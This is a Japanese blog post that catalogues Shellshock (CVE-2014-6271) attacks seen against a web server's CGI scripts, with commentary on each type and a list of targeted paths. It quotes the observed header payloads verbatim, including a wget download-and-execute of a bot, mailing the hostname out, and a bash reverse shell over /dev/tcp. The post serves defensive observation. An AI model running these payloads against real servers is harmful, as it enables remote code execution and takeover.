ホーム > GNU/Linux > CVE-2014-6271利用攻撃の観測ログ

CVE-2014-6271利用攻撃の観測ログ

CVE-2014-6271、shellshockを利用したwebサーバのCGIを狙った攻撃をちょこちょこ観測しています。データが増え次第追記。
(shellshockと呼ぶとCVE-2014-7169も含んでおり紛らわしいのでCVE番号で表記しています)

1. pingを打たせてスキャンする系
User-Agentが

() { :;}; /bin/ping -c 1 (IPアドレス)

となっているやつ。すでにかなりの件数を観測。
ソースとping先が別のホストであることからDDoS狙いかな?とも思いましたがそうすると-c 1なのが理解できない。

2. echoさせる系

() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a
とか
() { :; }; echo Mozilla: `echo 1No2yKe0Uh`;

となっているもの。ちなみにこれ、少なくともapacheの環境下で、直接bashを呼び出す場合はContent-Typeヘッダがないのでこけるはずです。perlのsystem等に対しては有効。

3. ダウンロード・実行させる系

() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z (ipaddr)/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"

となっているやつ。ダウンロードされるのはperlで書かれた典型的なbot。現在のところ2種類のコードを確認しています。
10/5追記: 3種類目を観測しました、中身はrootkitのバイナリを含むperlスクリプト?

4. 何がしたいのかわからない系

Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0Cookie: () { :; }; /usr/bin/env ping -c 3 (ipaddr)Host: () { :; }; /usr/bin/env ping -c 3 (ipaddr)Referer: () { :; }; /usr/bin/env ping -c 3 (ipaddr)Cookie: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 (ipaddr)'; cat echoHost: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 (ipaddr)'; cat echoReferer: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 (ipaddr)'; cat echoAccept: */*

上記全部がUser-Agentです。Cookie、Host、Refererのヘッダに対してpingするコードを仕込もうとしているようですが、改行なしで全部つながっています。馬鹿か。
さらに後半はCVE-2014-7169狙いのようですが、そもそもこの書き方ではバグを誘発させないため何の意味もないコードと化しています。
/usr/bin/envから書き始めているあたり内容を理解もせずに公開されているPoCを適当に書き換えて投げ込んだだけでしょう。

5. ホストネームをメールで送る系(2014/10/1追記)

() { :; }; echo '/bin/hostname' | /bin/mail -s 'Target' (意味のある11文字)@gmail.com"

攻撃可能なホスト名をリスト化しようとしているようですが、hostnameはあくまで自称なので精度は怪しいところ。

6. bashの機能でtcpでコントロールサーバに繋ぎに行く系(2014/10/30追記)

() { ignored;};/bin/bash -i >& /dev/tcp/(ipaddr)/(port) 0>&1

bashのstdin、stdoutをtcpのソケットに紐付けてコントロールサーバにつなぎに行きます。
localhostでnc -l -pとかして待機してるとわかるのですが、リモートのサーバからコマンドを送れる状態となります。

攻撃対象のファイル名

  • /
  • /cgi-sys/defaultwebpage.cgi
  • /cgi-bin/count.cgi
  • /cgi-bin/test.cgi
  • /cgi-bin/help.cgi
  • /cgi-bin/index.cgi
  • /cgi-bin/test.sh
  • /test
  • //cgi-bin//he
  • /cgi-bin/hi
  • /dana-na/auth/url_default/welcome.cgi

その他の特徴あるやつ

    リファラが「http://www.baidu.com」になっているものがある。発信元は118.192.48.6固定っぽい?IPアドレス的に離れた複数のホストに同一ソースからぶちまけられていた。
広告
カテゴリー:GNU/Linux
  1. まだコメントはありません。
  1. No trackbacks yet.

コメントを残す

以下に詳細を記入するか、アイコンをクリックしてログインしてください。

WordPress.com ロゴ

WordPress.com アカウントを使ってコメントしています。 ログアウト / 変更 )

Twitter 画像

Twitter アカウントを使ってコメントしています。 ログアウト / 変更 )

Facebook の写真

Facebook アカウントを使ってコメントしています。 ログアウト / 変更 )

Google+ フォト

Google+ アカウントを使ってコメントしています。 ログアウト / 変更 )

%s と連携中

%d人のブロガーが「いいね」をつけました。